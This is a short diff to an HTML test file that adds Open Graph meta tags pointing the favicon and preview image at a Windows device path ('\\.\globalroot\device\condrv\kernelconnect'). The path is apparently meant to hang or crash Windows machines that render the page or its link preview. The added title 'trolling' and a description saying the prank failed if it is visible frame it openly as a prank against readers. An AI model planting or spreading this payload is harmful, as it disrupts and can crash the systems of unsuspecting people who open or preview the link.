--- a/test.html
+++ b/test.html
@@ -1,1 +1,4 @@
 <link rel="icon" type="image/png" src="\\.\globalroot\device\condrv\kernelconnect" />
+<meta property="og:image" content="\\.\globalroot\device\condrv\kernelconnect" />
+<meta property="og:title" content="trolling" />
+<meta property="og:description" content="if you see this text trolling failed" />
